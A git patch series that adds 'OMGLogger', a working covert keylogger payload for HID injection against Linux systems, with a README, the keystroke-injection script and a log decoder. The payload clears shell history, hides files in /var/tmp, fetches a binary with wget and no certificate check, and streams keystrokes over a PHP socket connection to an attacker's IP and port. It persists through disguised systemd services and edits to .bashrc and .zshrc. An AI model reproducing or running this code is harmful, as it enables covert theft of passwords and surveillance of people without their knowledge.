From a08e420a23315edf4f9f253c8d29db443a444b40 Mon Sep 17 00:00:00 2001 From: drapl0n <87269662+drapl0n@users.noreply.github.com> Date: Wed, 18 May 2022 21:00:53 +0530 Subject: [PATCH 1/3] Uploading OMGLogger --- .../library/credentials/OMGLogger/README.md | 50 +++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 payloads/library/credentials/OMGLogger/README.md diff --git a/payloads/library/credentials/OMGLogger/README.md b/payloads/library/credentials/OMGLogger/README.md new file mode 100644 index 0000000..b27bf2b --- /dev/null +++ b/payloads/library/credentials/OMGLogger/README.md @@ -0,0 +1,50 @@ +## About: +* Title: OMGLogger +* Description: Key logger which sends each and every key stroke of target remotely/locally. +* AUTHOR: drapl0n +* Version: 1.0 +* Category: Credentials +* Target: Unix-like operating systems with systemd. +* Attackmodes: HID + +## OMGLogger: OMGLogger is a Key Logger which captures every key stroke of traget and send them to attacker. + +### Features: +* Live keystroke capturing. +* Detailed key logs. +* Persistent +* Autostart payload on boot. + +### Workflow: +* Encoding payload and injecting on target's system. +* Checks whether internet is connected to the target system. +* If internet is connected then it sends raw keystrokes to attacker. +* Attacker processes raw keystrokes. + +### Changes to be made in payload: +* Replace ip(0.0.0.0) and port number(4444) with your servers ip address and port number on line no `43`. +* Increase/Decrease time interval to restart service periodically (Default is 15 mins), on line no `59`. + +### Usage: +1. Encode payload.txt and inject into target's system. +2. Start netcat listner on attacking system: + +* `nc -lvp > ` use this command to create new logfile with raw keystrokes. +* `nc -lvp >> ` use this command to append raw keystrokes to existing logfile. +3. Process raw keystrokes using OMGLoggerDecoder utility: +``` +./OMGLoggerDecoder +OMGLoggerDecoder is used to decode raw key strokes acquired by OMGLogger. + +Usage: +Decode captured log: [./OMGLoggerDecoder -f -m -o ] + +Options: +-f Specify Log file. +-m Select Mode(normal|informative) +-o Specify Output file. +-h For this banner. +``` + +#### Support me if you like my work: +* https://twitter.com/drapl0n From 46f5f0e13ab69ee0ea165b69167f89de14de4619 Mon Sep 17 00:00:00 2001 From: drapl0n <87269662+drapl0n@users.noreply.github.com> Date: Wed, 18 May 2022 21:02:35 +0530 Subject: [PATCH 2/3] Uploading Payload --- .../library/credentials/OMGLogger/payload.txt | 93 +++++++++++++++++++ 1 file changed, 93 insertions(+) create mode 100644 payloads/library/credentials/OMGLogger/payload.txt diff --git a/payloads/library/credentials/OMGLogger/payload.txt b/payloads/library/credentials/OMGLogger/payload.txt new file mode 100644 index 0000000..ec30c15 --- /dev/null +++ b/payloads/library/credentials/OMGLogger/payload.txt @@ -0,0 +1,93 @@ +REM Title: DuckyLogger +REM Description: Key logger which sends each and every key stroke of target remotely/locally. +REM AUTHOR: drapl0n +REM Version: 1.0 +REM Category: Credentials +REM Target: Unix-like operating systems with systemd +REM Attackmodes: HID + +REM [Note] +REM Visit https://github.com/drapl0n/DuckyLogger/README.md for usage and other important instructions. + +REM [keeping tracks clear] +DELAY 5000 +CTRL ALT t +DELAY 400 +STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE +ENTER +DELAY 100 + +REM [creating key logging mechanism] +STRING mkdir /var/tmp/.system +ENTER +DELAY 100 +STRING echo "/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys +ENTER +DELAY 100 +STRING chmod +x /var/tmp/.system/sys +ENTER +DELAY 100 + +REM [importing xinput] +STRING cd /var/tmp/.system/ +ENTER +DELAY 100 +STRING wget --no-check-certificate --content-disposition https://github.com/drapl0n/DuckyLogger/blob/main/xinput\?raw=true +ENTER +DELAY 5000 +STRING chmod +x xinput +ENTER +DELAY 100 + +REM [creating reverse shell] +STRING echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus +ENTER +DELAY 100 +STRING chmod +x /var/tmp/.system/systemBus +ENTER +DELAY 100 + +REM [creating systemd service to execute payload on boot] +STRING mkdir -p ~/.config/systemd/user +ENTER +DELAY 200 +STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service +ENTER +DELAY 100 + +REM [creating reboot script incase if listner stops or targets internet connection gets lost] +STRING echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot +ENTER +DELAY 100 +STRING chmod +x /var/tmp/.system/reboot +ENTER +DELAY 100 + +REM [creating systemd service to execute payload on boot] +STRING echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/reboot.service +ENTER +DELAY 100 + +REM [enabling service] +STRING systemctl --user daemon-reload +ENTER +DELAY 300 +STRING systemctl --user enable --now systemBUS.service +ENTER +DELAY 150 +STRING systemctl --user start --now systemBUS.service +ENTER +DELAY 150 +STRING systemctl --user enable --now reboot.service +ENTER +DELAY 150 +STRING systemctl --user start --now reboot.service +ENTER +DELAY 100 + +REM [autostarting service on terminal/shell launch] +STRING echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > ~/tmmmp +ENTER +DELAY 100 +STRING chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit +ENTER From 60112142d61bb1768a2585b0dce019d61593ed80 Mon Sep 17 00:00:00 2001 From: drapl0n <87269662+drapl0n@users.noreply.github.com> Date: Wed, 18 May 2022 21:03:29 +0530 Subject: [PATCH 3/3] Uploading OMGLoggerDecoder --- .../credentials/OMGLogger/OMGLoggerDecoder | 51 +++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 payloads/library/credentials/OMGLogger/OMGLoggerDecoder diff --git a/payloads/library/credentials/OMGLogger/OMGLoggerDecoder b/payloads/library/credentials/OMGLogger/OMGLoggerDecoder new file mode 100644 index 0000000..b096e5e --- /dev/null +++ b/payloads/library/credentials/OMGLogger/OMGLoggerDecoder @@ -0,0 +1,51 @@ +#!/bin/bash +usage () { + echo -e "OMGLoggerDecoder is used to decode raw key strokes acquired by OMGLogger.\n" + echo -e "Usage: \nDecode captured log:\t[./OMGLoggerDecoder -f -m -o ]"; + echo -e "\nOptions:" + echo -e "-f\tSpecify Log file." + echo -e "-m\tSelect Mode(normal|informative)" + echo -e "-o\tSpecify Output file." + echo -e "-h\tFor this banner." +} +while getopts o:m:f:h: flag +do + case "${flag}" in + o) output=$OPTARG ;; + m) mode=$OPTARG ;; + f) filename=$OPTARG ;; + h) help=$OPTARG ;; + *) + usage + exit 1 + esac +done + +if [ -z "$output" ] && [ -z "$filename" ]; then + usage + exit 1 +fi +if [ -z "$filename" ]; then + echo -e "OMGLoggerDecoder: Missing option \"-f\"(Log file not specified).\nUse \"-h\" for more information." >&2 + exit 1 +fi +if [ -z "$output" ]; then + echo -e "OMGLoggerDecoder: Missing option \"-o\"(Output file not specified).\nUse \"-h\" for help." >&2 + exit 1 +fi +if [ -z "$mode" ]; then + echo -e "OMGLoggerDecoder: Missing option \"-m\"(Mode not specified).\nUse \"-h\" for help." >&2 + exit 1 +fi +if [ "$mode" != "informative" ] && [ "$mode" != "normal" ]; then + echo -e "DuckyLoggerDecoder: Invalid mode \"$mode\".\nUse \"-h\" for help." >&2 + exit 1 +fi +if [ "$mode" == "normal" ] ; then + awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename | grep press | awk '{print $4}' > $output + exit 1 +fi +if [ "$mode" == "informative" ] ; then + awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename > $output + exit 1 +fi